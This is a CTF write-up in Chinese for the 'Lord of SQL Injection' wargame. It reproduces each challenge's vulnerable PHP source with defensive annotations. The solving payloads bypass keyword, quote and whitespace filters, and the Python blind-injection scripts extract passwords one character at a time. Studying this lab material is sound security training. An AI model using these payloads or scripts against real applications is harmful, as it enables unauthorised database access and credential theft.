LORD OF SQLINJECTION-Writeup

网站:https://los.rubiya.kr/
参考了GitHub上的相应writeup和代码,记录下做题过程,以备日后学习之需。

  1. gremlin
    query : select id from prob_gremlin where id='' and pw=''
    source code:

    <?php
    // Challenge "gremlin": id and pw come straight from $_GET and are
    // interpolated into the SQL string; the keyword denylist below is the only control.
    include "./config.php";
    login_chk();
    $db = dbconnect();
    // Denylist (case-insensitive): "prob", "_", ".", "()". A denylist is not a
    // quoting mechanism -- the statement structure remains caller-controlled.
    // $_GET[id] uses a bare-word key and relies on PHP's undefined-constant fallback.
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~")); // do not try to attack another table, database!
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
    // Injection sink: string-built SQL. The fix is mysqli_prepare() with bound
    // parameters, never interpolating request data into the query text.
    $query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
    // The final SQL is echoed to the client, so the query text itself is disclosed.
    echo "<hr>query : <strong>{$query}</strong><hr><br>";
    // '@' suppresses driver errors: a failing query becomes false and reads as "no row".
    $result = @mysqli_fetch_array(mysqli_query($db,$query));
    // Any returned row counts as a solve; solve() is defined in config.php (not shown).
    if($result['id']) solve("gremlin");
    highlight_file(__FILE__);
    ?>

    解决方法:?id=' or '1'='1

  2. cobolt
    query : select id from prob_cobolt where id='' and pw=md5('')
    source code:

    <?php
    // Challenge "cobolt": same denylist as gremlin, but pw is hashed server-side
    // with md5() and the returned id must be exactly 'admin'.
    include "./config.php"; 
    login_chk();
    $db = dbconnect();
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Sink: both values are interpolated into the SQL text. Hashing pw inside the
    // query does nothing for the id value, which is still raw. Use bound parameters.
    $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Only the first fetched row is inspected; its id is reflected back to the client
    // on the non-admin branch, which leaks which row the query matched.
    if($result['id'] == 'admin') solve("cobolt");
    elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
    highlight_file(__FILE__); 
    ?>

    解决方法:?id=' or id='admin'%23
    注:id为admin才行,否则会显示Hello rubiya You are not admin :(

  3. goblin
    query : select id from prob_goblin where id='guest' and no=

    <?php 
    // Challenge "goblin": `no` is a numeric column and is interpolated UNQUOTED,
    // so the quote denylist below does not constrain the SQL grammar at all.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
    // Rejects ', " and ` -- irrelevant for an unquoted numeric position.
    if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 
    // Sink: unquoted interpolation. Cast to int (or bind as an integer parameter).
    $query = "select id from prob_goblin where id='guest' and no={$_GET[no]}"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // The matched id is echoed, so the response doubles as a query oracle.
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    if($result['id'] == 'admin') solve("goblin");
    highlight_file(__FILE__); 
    ?>

    解决方法:?no=' or id=0x61646d696e
    注:不能有引号,0x61646D696E是admin的十六进制。可以用转码工具:https://tool.lu/hexstr/

  4. orc(盲注)

    <?php 
    // Challenge "orc" (blind): two queries on the same input. The first only tells
    // the client whether some row matched ("Hello admin"), the second requires the
    // exact password. That one-bit answer is the blind-injection oracle.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Sink 1: raw interpolation of pw; errors are suppressed by '@'.
    $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Boolean oracle: the message depends only on whether a row came back.
    if($result['id']) echo "<h2>Hello admin</h2>"; 
    
    // Sink 2 is escaped with addslashes() and additionally compared in PHP, so it is
    // not injectable -- but the comparison uses the slashed value of pw.
    $_GET[pw] = addslashes($_GET[pw]); 
    $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
    highlight_file(__FILE__); 
    ?>

    解决方法:

    import requests
    # Boolean-based blind probe for the "orc" challenge (Python 2 syntax: print
    # statements). The page answers "Hello admin" whenever the injected condition
    # is true, and that single bit is used to recover the password.
    # From a defender's view this traffic is easy to spot: one session issuing a
    # long burst of requests whose `pw` parameter differs only by a counter.
    url = 'https://los.rubiya.kr/chall/orc_xxx.php'# change this
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
    cookies={'PHPSESSID':'xxx'}# change this -- placeholder session id
    length = 5   # initial guess for length(pw); incremented until the oracle answers true
    flag=""      # recovered password, appended to one character at a time
    # Phase 1: find the password length.
    while 1:
     params = {'pw': "' or length(pw)="+str(length)+"-- "}
     response = requests.get(url, headers=headers, cookies=cookies, params=params)
     status_code = response.status_code   # assigned but never read
     html_data = response.text
     print(response.url)
     if(html_data.find("Hello admin") != -1):
         print "Hello admin"
         print "length = "+str(length)
         break
     else:
         length+=1
    # Phase 2: for each position 1..length, try ASCII codes 48..122 ('0'..'z')
    # until the oracle fires; up to 75 requests per character.
    for i in range(1,length+1):
     for j in range(48,123):
         params = {'pw': "' or id='admin' and  ascii(substr(pw,"+str(i)+",1))="+str(j)+"-- "}
         response = requests.get(url, headers=headers, cookies=cookies, params=params)
         status_code = response.status_code   # unused
         html_data = response.text
         print(response.url)
         if (html_data.find("Hello admin") != -1):
             print "Hello admin"
             flag+=chr(j)
             print flag
             break

    注:学习了GitHub上noonzib/Lord-of-Sql-injection/blob/master/orc_ex.py,这个代码的思路,先盲注试出长度,然后盲注得出flag。后面几题盲注的代码结构也大致如此,在params上做出调整。

  5. wolfman

    <?php 
    // Challenge "wolfman": adds a space denylist on top of the keyword denylist.
    // Denying one separator character does not change the fact that pw is
    // interpolated into SQL text; the remediation is still a bound parameter.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Rejects the ASCII space only (the /i flag is meaningless for a space).
    if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 
    $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Matched id is reflected to the client.
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    if($result['id'] == 'admin') solve("wolfman"); 
    highlight_file(__FILE__); 
    ?>

    注:不能有空格,用||表示or关系。
    解决方法:?pw=%27||id=%27admin%27%23

  6. darkelf

    <?php 
    // Challenge "darkelf": denies the words "or" and "and" (case-insensitive).
    // Keyword denylists are brittle because SQL has operator spellings that are
    // not words; a prepared statement removes the need for the list entirely.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect();  
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Note this also rejects any benign password containing "or"/"and" as substrings.
    if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
    // Sink: raw interpolation of pw.
    $query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    if($result['id'] == 'admin') solve("darkelf"); 
    highlight_file(__FILE__); 
    ?>

    注:不能有or、and,沿用||的方法。
    解决方法:?pw=%27||id=%27admin%27%23

  7. orge(盲注)

<?php 

    代码和orc那题一样。

  8. troll

    <?php  
    // Challenge "troll": uses the legacy ext/mysql API and ereg(), both removed in
    // PHP 7. The PHP-side filter (ereg, case-sensitive) and the SQL consumer
    // (case-insensitive collation by default) disagree on what "admin" means --
    // a classic filter/consumer mismatch. dbconnect()'s return value is not kept.
    include "./config.php"; 
    login_chk(); 
    dbconnect(); 
    // Only the single-quote character is denied.
    if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
    // Case-sensitive substring check; '@' hides the deprecation notice.
    if(@ereg("admin",$_GET[id])) exit("HeHe");
    // Sink: raw interpolation of id.
    $query = "select id from prob_troll where id='{$_GET[id]}'";
    echo "<hr>query : <strong>{$query}</strong><hr><br>";
    $result = @mysql_fetch_array(mysql_query($query));
    if($result['id'] == 'admin') solve("troll");
    highlight_file(__FILE__);
    ?>

    解决方法:?id=Admin(任意字母改成大写即可)
    注:sql不区分大小写,除非加binary区分。

  9. vampire

    <?php 
    // Challenge "vampire": sanitises by lower-casing and then removing "admin"
    // with a single, non-repeated str_replace(). One pass of token removal does
    // not guarantee the token is absent from the output; remove-and-recheck (or
    // reject outright) is the safe shape, and the SQL still needs a bound parameter.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
    $_GET[id] = strtolower($_GET[id]);
    // Single pass: the result is not re-scanned for the removed substring.
    $_GET[id] = str_replace("admin","",$_GET[id]); 
    // Sink: raw interpolation of the (partially) sanitised id.
    $query = "select id from prob_vampire where id='{$_GET[id]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if($result['id'] == 'admin') solve("vampire"); 
    highlight_file(__FILE__); 
    ?>

    注:转小写、替换admin为空字符串。
    解决方法:?id=adadminmin

  10. skeleton

    <?php 
    // Challenge "skeleton": the query ends in a hard-coded "and 1=0", intended to
    // make it unsatisfiable. That guard relies on the rest of the statement staying
    // intact after pw is interpolated, which string building cannot guarantee.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Sink: raw interpolation of pw ahead of the trailing constant predicate.
    $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if($result['id'] == 'admin') solve("skeleton"); 
    highlight_file(__FILE__); 
    ?>

    注:井号(URL 编码为 %23)用作 SQL 注释
    解决方法:?pw=' or id='admin'%23

  11. golem(盲注)

    <?php 
    // Challenge "golem" (blind): same two-query oracle as "orc", with a wider
    // denylist: "or", "and", "substr(" and "=". Denying individual function
    // names and operators does not remove the oracle; SQL offers equivalents.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
    // Sink 1: raw interpolation; the response reveals only whether a row matched.
    $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    
    // Sink 2 is escaped and verified in PHP against the stored pw.
    $_GET[pw] = addslashes($_GET[pw]); 
    $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
    highlight_file(__FILE__); 
    ?>

    注:不能用substr,换成mid,=换成like
    部分代码:

    # Partial script for "golem" (blind): only the lines that differ from the orc
    # script are shown. `length`, `flag`, `url`, `headers`, `cookies` and the
    # `requests` import are assumed to come from that script. The loop bodies
    # below are not indented -- the paste appears to have flattened them.
    while 1:
    # '=' is denied for this challenge, so the length is bracketed with '<' and
    # corrected by one once the comparison first becomes true.
    params = {'pw': "'||length(pw)<"+str(length)+"-- "}
    response = requests.get(url, headers=headers, cookies=cookies, params=params)
    status_code = response.status_code   # unused
    html_data = response.text
    print(response.url)
    if(html_data.find("Hello admin") != -1):
        print "Hello admin"
        length -= 1
        print "length = "+str(length)
        break
    else:
        length+=1
    # Per-character phase: mid()/like replace the denied substr()/'='.
    for i in range(1,length+1):
    for j in range(48,123):
        params = {'pw': "'||id like 'admin'&&ascii(mid(pw,"+str(i)+",1)) like "+str(j)+"-- "}# this is the key change
        response = requests.get(url, headers=headers, cookies=cookies, params=params)
        status_code = response.status_code   # unused
        html_data = response.text
        print(response.url)
        if (html_data.find("Hello admin") != -1):
            print "Hello admin"
            flag+=chr(j)
            print flag
            break
  12. darkknight(盲注)

    <?php 
    // Challenge "darkknight" (blind): two injectable positions. pw is quoted and
    // only the quote is denied; `no` is interpolated UNQUOTED and has its own
    // denylist (', substr, ascii, =). An unquoted numeric position needs an
    // integer cast or bound parameter -- no character denylist makes it safe.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
    if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
    if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
    // Sink 1: pw quoted, `no` unquoted, both interpolated.
    $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Boolean oracle: matched id is reflected.
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    
    // Sink 2 is escaped and verified in PHP; only pw participates here.
    $_GET[pw] = addslashes($_GET[pw]); 
    $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
    highlight_file(__FILE__); 
    ?>

    注:ascii换成ord
    部分代码:

    # "darkknight" probe parameters: pw is a dummy value; the condition goes into
    # the unquoted numeric `no` field, using ord()/mid()/like in place of the
    # denied ascii()/substr()/'='. `i` and `j` come from the orc-style loops.
    params = {'pw':'123','no':'-1 or id like "admin" and ord(mid(pw,'+str(i)+',1)) like '+str(j)+'-- '}
  13. bugbear

    <?php 
    // Challenge "bugbear" (blind): the `no` denylist grows to ', substr, ascii, =,
    // or, and, the space character, like and 0x. The growing list is itself the
    // lesson: each new entry reacts to one bypass while the unquoted numeric
    // interpolation that causes the problem stays in place.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
    if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
    if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
    // Sink 1: pw quoted, `no` unquoted, both interpolated.
    $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Boolean oracle: matched id is reflected.
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    
    // Sink 2 is escaped and verified in PHP.
    $_GET[pw] = addslashes($_GET[pw]); 
    $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
    highlight_file(__FILE__); 
    ?>

    注:空格用 %0a 代替,& 用 %26 代替(URL 编码)
    代码:

    # "bugbear" probe as a raw query string: the space is denied, so %0a (LF) is
    # used as the token separator, and '&' is sent as %26 so the URL parser does
    # not treat it as a parameter delimiter. `i` and `j` come from the loops above.
    query='?no=1%0a||%0aid%0ain%0a("admin")%0a%26%26%0ahex(mid(pw,'+str(i)+',1))%0ain%0a(hex('+str(j)+'))'
  14. giant

    <?php 
    // Challenge "giant": the parameter is limited to one byte and four whitespace
    // characters (space, \n, \r, \t) are denied, yet the byte is spliced between
    // "from" and the table name. The denylist enumerates what the author thought
    // of, not what the SQL lexer accepts as a separator -- an allowlist would be
    // the safe shape, and a fixed query string the correct one.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(strlen($_GET[shit])>1) exit("No Hack ~_~"); 
    if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe"); 
    // Sink: interpolation directly into the statement's keyword stream.
    $query = "select 1234 from{$_GET[shit]}prob_giant where 1"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Success is simply "the query parsed and returned a row".
    if($result[1234]) solve("giant"); 
    highlight_file(__FILE__); 
    ?>

    解决方法:?shit=%0b

  15. assassin

    <?php 
    // Challenge "assassin": pw is used as a LIKE pattern with only the quote
    // denied. A caller-supplied LIKE pattern is an enumeration oracle even with
    // no quote at all (the wildcards are ordinary characters); patterns from
    // requests need wildcard escaping and, again, a bound parameter.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect(); 
    if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Sink: interpolated LIKE pattern.
    $query = "select id from prob_assassin where pw like '{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // First matching row's id is reflected -> per-request oracle.
    if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
    if($result['id'] == 'admin') solve("assassin"); 
    highlight_file(__FILE__); 
    ?>

    代码:

    # Partial script for "assassin": pw is matched with LIKE, so each request sends
    # the recovered prefix plus one candidate character plus a '%' wildcard.
    # `flag`, `headers`, `cookies` and `requests` are not defined in this fragment
    # (presumably from the earlier script); loop-body indentation looks flattened.
    text="Hello admin"
    for i in range(1,10):        # at most 9 characters are attempted
    for j in range(48,127):      # ASCII '0'..'~'
        token=0                  # becomes 1 once a character matched at this position
        url = 'https://los.rubiya.kr/chall/assassin_xxx.php'
        url+="?pw="+flag+chr(j)+"%"
        response = requests.get(url, headers=headers, cookies=cookies)
        status_code = response.status_code   # unused
        html_data = response.text
        print(response.url)
        if (html_data.find(text) != -1):
            print ("Find Key[+]")
            flag+=chr(j)
            print (flag)
            token=1
            break
    # No candidate matched at this position: treat the prefix as complete.
    if(token==0):
        break
  16. succubus

    <?php
    // Challenge "succubus": both id and pw deny the single quote. Denying the
    // quote alone does not establish a safe quoting context -- the escape
    // character is not denied, and the two values sit in adjacent quoted literals
    // of one string-built statement. Bound parameters make the quoting irrelevant.
    include "./config.php"; 
    login_chk();
    $db = dbconnect();
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
    if(preg_match('/\'/',$_GET[id])) exit("HeHe");
    if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
    // Sink: two adjacent interpolated literals.
    $query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    // Any row counts as a solve.
    if($result['id']) solve("succubus"); 
    highlight_file(__FILE__); 
    ?>

    解:?id=&pw=or true%23
    即select id from prob_succubus where id ='' and pw=' or true#',利用转义符号

  17. zombie_assassin

    <?php 
    // Challenge "zombie_assassin": the inputs are escaped with addslashes() and
    // THEN reversed with strrev(). Escaping is only valid for the exact byte
    // sequence that ends up in the query; any transformation after escaping
    // (here: reversal moves the backslash to the other side of the quote)
    // invalidates it. Escape last, or better, bind parameters.
    include "./config.php"; 
    login_chk(); 
    $db = dbconnect();
    // Order matters: addslashes() first, strrev() second.
    $_GET['id'] = strrev(addslashes($_GET['id']));
    $_GET['pw'] = strrev(addslashes($_GET['pw']));
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
    // Sink: interpolation of the reversed, mis-escaped values.
    $query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
    echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
    $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
    if($result['id']) solve("zombie_assassin"); 
    highlight_file(__FILE__); 
    ?>

    解:?id=%00&pw=%231%20ro
    即select id from prob_zombie_assassin where id='0' and pw='or 1#'
    strrev反转字符串
    eg:
    addslashes($_GET['id']) : id = '
    strrev( id ) : '
    (2019-09-09)
